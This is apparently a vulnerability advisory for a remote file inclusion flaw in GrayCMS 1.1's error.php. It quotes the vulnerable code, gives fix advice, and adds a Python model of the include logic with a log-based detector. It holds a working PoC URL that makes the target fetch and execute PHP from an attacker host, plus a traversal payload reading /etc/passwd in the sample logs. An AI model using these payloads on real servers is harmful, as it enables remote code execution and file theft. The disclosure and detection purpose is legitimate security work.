GrayCMS remote file inclusion (PHP code injection)
Version: 1.1
Severity: High
Vendor: http://gcms.graymur.net/
The vulnerable code is in "code/error.php". $path_prefix is given its default value only when it is not already set, so with register_globals enabled (the PHP default before 4.2, and what the PoC below relies on) a request parameter of the same name overrides it, and the resulting string goes unchanged into two require statements. Because require accepts URLs when allow_url_fopen is on (PHP 5.2 and later additionally need allow_url_include), an attacker can point $path_prefix at a host they control and have arbitrary PHP executed by the target:
<----begin---->
...
if (!isset($page)) $page = '';
if (!isset($path_prefix)) $path_prefix = '../';   // defaulted only if unset: a request variable of this name survives
if (empty($main)) {
    require $path_prefix.'code/main.dat';          // first attacker-controlled include
}
if (isset($e404) or isset($_GET['e404'])) {
...
}
if (isset($e403) or isset($_GET['e403'])) {
...
}
require $path_prefix.'code/blocks.php';            // second attacker-controlled include, reached on every request
exit;
<----end---->
PoC:
http://localhost/CMS/gcms/code/error.php?path_prefix=http://www.kiddiehost.com/

With this request $path_prefix becomes "http://www.kiddiehost.com/", so error.php fetches and executes http://www.kiddiehost.com/code/main.dat (as long as $main is empty, which it is unless the request sets it) and then http://www.kiddiehost.com/code/blocks.php. Whatever PHP the attacker hosts at those two paths runs on the target with the web server's privileges. Fix: assign $path_prefix unconditionally instead of testing isset(), never build include paths from request data, and turn off register_globals and allow_url_fopen/allow_url_include.
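Added example (Python, not part of the advisory and not GrayCMS code): it models how error.php picks its require targets once register_globals turns query parameters into variables, and then runs the same idea in reverse as a detector over access-log lines. The log lines, client IPs and the /code/error.php path suffix are constructed for the example; the first log line reproduces the PoC request above.

```python
# Added example: not GrayCMS code. Models how code/error.php picks its require()
# targets when register_globals hands request parameters to PHP as variables,
# and flags access-log lines that carry file-inclusion attempts against it.
import re
from urllib.parse import parse_qs, urlsplit

DEFAULT_PREFIX = "../"          # fallback error.php assigns when $path_prefix is unset
ERROR_SCRIPT = "/code/error.php"  # assumed location suffix of the vulnerable script
INCLUDE_PARAMS = {"path_prefix"}  # request variables that reach require() in error.php

# Any URL scheme (http://, ftp://, php://, data://) in an include path means a
# remote or stream-wrapper inclusion rather than the intended relative path.
URL_SCHEME = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*://")

# Apache/nginx combined log: client IP, then the quoted request line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*"'
)


def register_globals(query):
    """Mimic PHP register_globals: each query parameter becomes a variable.
    Only the first value of a repeated scalar parameter is kept."""
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def php_empty(value):
    """PHP empty() on a string variable: unset, '' and '0' all count as empty."""
    return value is None or value in ("", "0")


def error_php_includes(query):
    """Return, in order, the paths error.php would hand to require for this
    query string. Follows the vulnerable snippet: $path_prefix is defaulted only
    if not already set, a non-empty $main skips main.dat, blocks.php is always
    required."""
    g = register_globals(query)
    path_prefix = g.get("path_prefix", DEFAULT_PREFIX)
    targets = []
    if php_empty(g.get("main")):
        targets.append(path_prefix + "code/main.dat")
    targets.append(path_prefix + "code/blocks.php")
    return targets


def rfi_attempts(log_lines):
    """Return (client_ip, parameter, value) for every request to error.php whose
    include-controlling parameter carries a URL scheme, directory traversal or
    a NUL byte (the classic local-file-inclusion truncation trick)."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("uri"))
        if not parts.path.endswith(ERROR_SCRIPT):
            continue
        for name, value in register_globals(parts.query).items():
            if name not in INCLUDE_PARAMS:
                continue
            if URL_SCHEME.match(value) or "../" in value or "\x00" in value:
                hits.append((m.group("ip"), name, value))
    return hits


# Constructed sample log lines (not real traffic). The first reproduces the PoC
# request from the advisory; the last is a local-file-inclusion variant.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2006:13:55:36 +0200] "GET /CMS/gcms/code/error.php?path_prefix=http://www.kiddiehost.com/ HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
    '198.51.100.4 - - [10/Oct/2006:13:56:01 +0200] "GET /CMS/gcms/index.php?page=news HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2006:13:57:12 +0200] "GET /CMS/gcms/code/error.php?e404=1 HTTP/1.1" 404 300 "-" "Mozilla/4.0"',
    '192.0.2.9 - - [10/Oct/2006:13:58:40 +0200] "GET /CMS/gcms/code/error.php?path_prefix=../../../../etc/passwd%00 HTTP/1.0" 200 100 "-" "curl/7.15.0"',
]

if __name__ == "__main__":
    for q in ("", "path_prefix=http://www.kiddiehost.com/"):
        print(f"query {q!r:45} -> require {error_php_includes(q)}")
    for ip, name, value in rfi_attempts(SAMPLE_LOG):
        print(f"inclusion attempt from {ip}: {name}={value!r}")
```

error_php_includes shows why the PoC works: an empty query yields the intended ../code/main.dat and ../code/blocks.php, the PoC query yields both files under http://www.kiddiehost.com/, and adding main=1 still leaves the unconditional blocks.php include, so there is no request shape in which the attacker's prefix is ignored. The detector deliberately matches on the parameter value rather than on a known attacker host, which is what makes it useful for retroactive log review.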
mail me: maggik <at> gala <dot> net
icq: 3316667
greetz to: ghc, 0xdeadbabe, unl0ck & others